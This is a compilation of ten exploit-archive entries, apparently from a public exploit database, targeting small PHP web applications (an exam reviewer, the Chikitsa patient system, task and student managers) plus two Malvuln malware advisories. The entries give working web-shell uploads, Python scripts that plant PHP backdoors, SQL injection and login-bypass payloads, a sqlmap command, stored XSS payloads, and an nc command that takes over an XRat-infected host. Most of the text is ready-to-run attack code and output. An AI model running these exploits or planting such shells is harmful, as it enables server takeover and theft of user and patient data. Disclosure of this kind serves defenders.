<pre><code># Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-02-08<br /># Exploit Author: Juli Agarwal(@agarwaljuli)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html<br /><br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code<br /><br /># Version: 1.0<br /># Tested on: XAMPP, Kali Linux<br /><br /><br /><br />Description – The application suffers from a remote code execution in the<br />admin panel. An authenticated attacker can upload a web-shell php file in<br />profile page to achieve remote code execution.<br /><br /><br /><br />POC:-<br /><br /><br /><br />==========<br /><br /># Request:<br /><br />==========<br /><br />POST /erms/classes/Users.php?f=save HTTP/1.1<br /><br />Host: localhost<br /><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br /><br />Accept: */*<br /><br />Accept-Language: en-US,en;q=0.5<br /><br />X-Requested-With: XMLHttpRequest<br /><br />Content-Type: multipart/form-data;<br />boundary=---------------------------37791356766765055891341961306<br /><br />Content-Length: 1004<br /><br />Origin: http://localhost<br /><br />Connection: close<br /><br />Referer: http://localhost/erms/admin/?page=user<br /><br />Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a<br /><br /><br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="id"<br /><br /><br /><br />1<br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="firstname"<br /><br /><br /><br />Adminstrator<br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="lastname"<br /><br /><br /><br />Admin<br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="username"<br /><br /><br /><br />admin<br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="password"<br /><br /><br /><br />-----------------------------37791356766765055891341961306<br /><br />Content-Disposition: form-data; name="img"; filename="shell.php"<br /><br />Content-Type: application/x-php<br /><br /><br /><br /><html><br /><br /><body><br /><br /><b>Remote code execution: </b><br><pre><br /><br /> <?php if(isset($_REQUEST['cmd'])){ echo<br />"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br /><br /></pre><br /><br /></body><br /><br /></html><br /><br /><br /><br />-----------------------------37791356766765055891341961306—<br /><br /><br /><br />================<br /><br /># Webshell access:<br /><br />================<br /><br /><br /><br /># Webshell access via:<br /><br />POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id<br /><br /><br /><br /># Webshell response:<br /><br />Remote code execution:<br /><br />uid=1(daemon) gid=1(daemon) groups=1(daemon)<br /><br /></code></pre>
<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/12/2021<br /># Exploit Author: 0z09e (https://twitter.com/0z09e)<br /># Vendor Homepage: https://sourceforge.net/u/dharashah/profile/<br /># Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download<br /># Version: 2.0.2<br /># Tested on: Ubuntu<br /><br />import requests<br />import os<br />import argparse<br /><br />def login(session , target , username , password):<br /> print("[+] Attempting to login with the credential")<br /> url = target + "/index.php/login/valid_signin"<br /> login_data = {"username" : username , "password" : password}<br /> session.post(url , data=login_data , verify=False)<br /> return session<br /><br />def generate_plugin():<br /> print("[+] Generating a malicious plugin")<br /> global tmp_dir<br /> tmp_dir = os.popen("mktemp -d").read().rstrip()<br /> open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")<br /> os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()<br /><br />def upload_plugin(session , target):<br /> print("[+] Uploading the plugin into the server.")<br /> url = target + "/index.php/module/upload_module/"<br /> file = open(f"{tmp_dir}/rce.zip" , "rb").read()<br /> session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})<br /> session.get(target + "/index.php/module/activate_module/rce" , verify=False)<br /> print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")<br /> print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")<br /><br />def main():<br /> parser = argparse.ArgumentParser("""<br /> __ _ __ _ __ <br /> _____/ /_ (_) /__(_) /__________ _<br /> / ___/ __ \/ / //_/ / __/ ___/ __ `/<br />/ /__/ / / / / ,< / / /_(__ ) /_/ / <br />\___/_/ /_/_/_/|_/_/\__/____/\__,_/ <br /> <br />Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution : <br />POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)<br /> req_args = parser.add_argument_group('required arguments')<br /> req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")<br /> req_args.add_argument("-u" , "--username" , help="Username" , required=True)<br /> req_args.add_argument("-p" , "--password" , help="password", required=True)<br /> args = parser.parse_args()<br /><br /> target = args.URL<br /> if target[-1] == "/":<br /> target = target[:-1]<br /> username = args.username<br /> password = args.password<br /><br /> session = requests.session()<br /> login(session , target , username , password)<br /> generate_plugin()<br /> upload_plugin(session , target)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection<br /># Date: 2022-02-18<br /># Exploit Author: Juli Agarwal(@agarwaljuli)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html<br /><br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code<br /><br /># Version: 1.0<br /># Tested on: Windows 10/Kali Linux<br /><br /><br /><br />Description – The ‘id’ parameter in Exam Reviewer Management System web<br />application is vulnerable to SQL Injection<br /><br />Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1<br /><br /><br /><br />POC:-<br /><br /><br /><br />---<br /><br />Parameter: id (GET)<br /><br />Type: boolean-based blind<br /><br />Title: AND boolean-based blind - WHERE or HAVING clause<br /><br />Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu<br /><br /><br /><br />Type: error-based<br /><br />Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY<br />clause (FLOOR)<br /><br />Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT<br />COUNT(*),CONCAT(0x71766a7071,(SELECT<br />(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA<br /><br /><br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)<br />AND 'vqGg'='vqGg---<br /><br /><br /><br />*SQLMAP COMMAND*<br /><br /><br /><br />*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1<br /><http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*<br /><br /></code></pre>
<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/12/2021<br /># Exploit Author: 0z09e (https://twitter.com/0z09e)<br /># Vendor Homepage: https://sourceforge.net/u/dharashah/profile/<br /># Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download<br /># Version: 2.0.2<br /># Tested on: Ubuntu<br /><br />import requests<br />import os<br />from zipfile import ZipFile<br />import argparse<br /><br /><br /><br /><br />def login(session , target , username , password):<br /> print("[+] Attempting to login with the credential")<br /> url = target + "/index.php/login/valid_signin"<br /> login_data = {"username" : username , "password" : password}<br /> session.post(url , data=login_data , verify=False)<br /> return session<br /><br /><br />def download_backup( session , target):<br /> print("[+] Downloading the backup (This may take some time)")<br /> url = target + "/index.php/settings/take_backup/"<br /> backup_req = session.get(url , verify=False)<br /> global tmp_dir<br /> tmp_dir = os.popen("mktemp -d").read().rstrip()<br /> open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)<br /> print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")<br /><br /><br />def modify_backup():<br /> print("[+] Modifying the backup by injecting a backdoor.")<br /> zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')<br /> zf.extractall(tmp_dir)<br /> zf.close()<br /> open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")<br /> os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()<br /><br /><br />def upload_backup(session , target):<br /> print("[+] Uploading the backup back into the server.(This may take some time)")<br /> url = target + "/index.php/settings/restore_backup"<br /> file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()<br /> session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})<br /> print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")<br /> print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")<br /><br /><br /><br /><br />def main():<br /> parser = argparse.ArgumentParser("""<br /> __ _ __ _ __ <br /> _____/ /_ (_) /__(_) /__________ _<br /> / ___/ __ \/ / //_/ / __/ ___/ __ `/<br />/ /__/ / / / / ,< / / /_(__ ) /_/ / <br />\___/_/ /_/_/_/|_/_/\__/____/\__,_/ <br /> <br />Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : <br />POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)<br /> req_args = parser.add_argument_group('required arguments')<br /> req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")<br /> req_args.add_argument("-u" , "--username" , help="Username" , required=True)<br /> req_args.add_argument("-p" , "--password" , help="password", required=True)<br /> args = parser.parse_args()<br /><br /> target = args.URL<br /> if target[-1] == "/":<br /> target = target[:-1]<br /> username = args.username<br /> password = args.password<br /><br /> session = requests.session()<br /> login(session ,target , username , password)<br /> download_backup(session , target )<br /> modify_backup()<br /> upload_backup(session , target)<br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3d4350282ae043177063de2ad4827b97.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.XRat.k<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: XRat malware listens on TCP port 20888. Third-party attackers who can reach the system can run commands hijacking the infected host.<br />Type: PE32<br />MD5: 3d4350282ae043177063de2ad4827b97<br />Vuln ID: MVID-2022-0482<br />Dropped files: Rat.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 20888<br />"X-Rat System Console" v2.8<br /><br />Status Ready, Client: 192.168.18.130:8325<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#exec calc<br /><br /><br />Command "EXEC" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]# <br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass<br /># Exploit Author: able403<br /># Date: 08/12/2021<br /># Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip<br /># Version: 1.0<br /># Tested on: windows 10 <br /># Vulnerable page: Actions.php<br /># VUlnerable parameters: "username"<br /><br />Technical description:<br /><br />An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.<br /><br />Steps to exploit:<br /><br />1) Navigate to http://localhost/login.php<br /><br />2) Insert your payload in the user or password field <br /><br />3) Click login<br /><br />Proof of concept (Poc):<br /><br />The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - <br /><br />123'+or+1=1+--+-<br /><br /><br /><br /><br />--- <br /><br /><br /><br /><br />POST /Actions.php?a=employee_login HTTP/1.1<br /><br />Host: localhost<br /><br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br /><br />Accept: application/json, text/javascript, */*; q=0.01<br /><br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br /><br />Accept-Encoding: gzip, deflate<br /><br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br /><br />X-Requested-With: XMLHttpRequest<br /><br />Content-Length: 43<br /><br />Origin: http://edtms.com<br /><br />Connection: close<br /><br />Referer: http://edtms.com/login.php<br /><br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br /><br /><br /><br />email=admin'+or+1=1+--+-&password=123123213<br /><br /><br /><br /><br />response<br /><br /><br /><br /><br />HTTP/1.1 200 OK<br /><br />Date: Wed, 10 Nov 2021 02:23:38 GMT<br /><br />Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02<br /><br />X-Powered-By: PHP/8.0.2<br /><br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br /><br />Cache-Control: no-store, no-cache, must-revalidate<br /><br />Pragma: no-cache<br /><br />Connection: close<br /><br />Content-Type: text/html; charset=UTF-8<br /><br />Content-Length: 48<br /><br /><br /><br /><br />{"status":"success","msg":"Login successfully."}<br /><br /><br /><br /><br />---<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/16fab35b51f9e6447f2a8c04db4ebe93.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Frauder.jt<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an extensionless PE file named "x" with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 16fab35b51f9e6447f2a8c04db4ebe93<br />Vuln ID: MVID-2022-0481<br />Dropped files: x<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />C:\>cacls x<br />C:\x BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir x<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/09/2013 01:43 PM 25,088 x<br /> 1 File(s) 25,088 bytes<br /> 0 Dir(s) 27,505,713,152 bytes free<br /><br />C:\>type x<br />MZÉ  !This program cannot be run in DOS mode.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)<br /># Exploit Author: able403<br /># Date: 08/12/2021<br /># Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip<br /># Version: 1.0<br /># Tested on: windows 10 <br /># Vulnerable page: ?page=view_task&id=2<br /><br />Technical description:<br /><br />A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. <br /><br />xss-1:<br /><br />1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task"<br />2) Insert your payload in the "title" and "Task Description" parameter parameter<br />3) Click save<br /><br />Proof of concept (Poc):<br /><br />The following payload will allow you to run the javascript - <br /><br />"><img src=# onerror=alert(123)><br /><br />---<br />POST /Actions.php?a=save_task HTTP/1.1<br /><br />Host: localhost<br /><br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br /><br />Accept: application/json, text/javascript, */*; q=0.01<br /><br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br /><br />Accept-Encoding: gzip, deflate<br /><br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br /><br />X-Requested-With: XMLHttpRequest<br /><br />Content-Length: 312<br /><br />Origin: http://localhost<br /><br />Connection: close<br /><br />Referer: http://localhost/?page=tasks<br /><br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br /><br /><br /><br />id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E<br /><br /><br /><br /><br /><br /><br /><br />xss-2 <br /><br />1) Navigate to http://localhost.com/?page=manage_account<br />2) Insert your payload in the "full name" or "contact" or "email" parameter parameter<br /><br />Proof of concept (Poc):<br /><br />The following payload will allow you to run the javascript - <br /><br />"><img src=# onerror=alert(123)><br /><br /><br /><br /><br />--<br /><br />POST /Actions.php?a=update_credentials_employee HTTP/1.1<br /><br />Host: localhost<br /><br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br /><br />Accept: application/json, text/javascript, */*; q=0.01<br /><br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br /><br />Accept-Encoding: gzip, deflate<br /><br />X-Requested-With: XMLHttpRequest<br /><br />Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384<br /><br />Content-Length: 1613<br /><br />Origin: http://localhost<br /><br />Connection: close<br /><br />Referer: http://localhost/?page=manage_account<br /><br />Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl<br /><br /><br /><br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="id"<br /><br /><br /><br /><br />1<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="fullname"<br /><br /><br /><br /><br />John D Smith<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="gender"<br /><br /><br /><br /><br />Male<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="dob"<br /><br /><br /><br /><br />1997-06-23<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="contact"<br /><br /><br /><br /><br />098123456789"><img src=# onerror=alert(123)><br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="email"<br /><br /><br /><br /><br />jsmith@sample.com<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="address"<br /><br /><br /><br /><br />Sample Address<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="department_id"<br /><br /><br /><br /><br />1<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="email"<br /><br /><br /><br /><br />jsmith@sample.com<br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="password"<br /><br /><br /><br /><br /><br /><br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="old_password"<br /><br /><br /><br /><br /><br /><br /><br />-----------------------------27882107026209045483167935384<br /><br />Content-Disposition: form-data; name="avatar"; filename=""<br /><br />Content-Type: application/octet-stream<br /><br /><br /><br /><br /><br /><br /><br />-----------------------------27882107026209045483167935384--<br /></code></pre>
<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux <br /><br /># Request sent as base user<br /><br />POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215<br />Content-Length: 769<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/hocms/admin/?page=system_info<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br /><br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="name"<br /><br /><br /><br />Home Owners Collection Management System'<br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="short_name"<br /><br /><br /><br />HOCMS - PHP<br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br /><br /><br /><br />-----------------------------31935477191495174627236953215<br />Content-Disposition: form-data; name="cover"; filename="cmd.php"<br />Content-Type: application/x-php<br /><br /><br /><br /><?php<br />if($_REQUEST['s']) {<br /> system($_REQUEST['s']);<br /> } else phpinfo();<br />?><br /></pre><br /></body><br /></html><br /><br /><br />-----------------------------31935477191495174627236953215--<br /><br /><br /># Response<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 09 Feb 2022 09:32:16 GMT<br />Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1<br />X-Powered-By: PHP/8.1.2<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br />1<br /><br /><br /># ------------------------------------------------------------------------------------------<br /># Request to webshell<br /># ------------------------------------------------------------------------------------------<br /><br />GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br />Upgrade-Insecure-Requests: 1<br /><br /><br /># ------------------------------------------------------------------------------------------<br /># Webshell response<br /># ------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 09 Feb 2022 09:39:06 GMT<br />Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1<br />X-Powered-By: PHP/8.1.2<br />Access-Control-Allow-Origin: *<br />Content-Length: 33<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br />0xSaudi<br /></pre><br /></body><br /></html><br /><br /></code></pre>
<pre><code># Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass<br /># Date: 2020-07-06<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html<br /># Version: 1.0<br /># Tested on: Windows & WampServer<br /># CVE: CVE-2020-23935<br /><br />1- Go to following url. >> http://(HOST)/admin/login.php<br />2- We can login succesfully with SQL bypass method. <br /><br />-- Username = admin'#<br />-- Password = (Write Something)<br /><br />NOTE: Default username and password is admin:admin.<br /><br />(( HTTP Request ))<br /><br />POST /process.php HTTP/1.1<br />Host: (HOST)<br />Connection: keep-alive<br />Content-Length: 51<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://(HOST)/<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://(HOST)/index.php?q=login<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl<br /><br />U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=<br /></code></pre>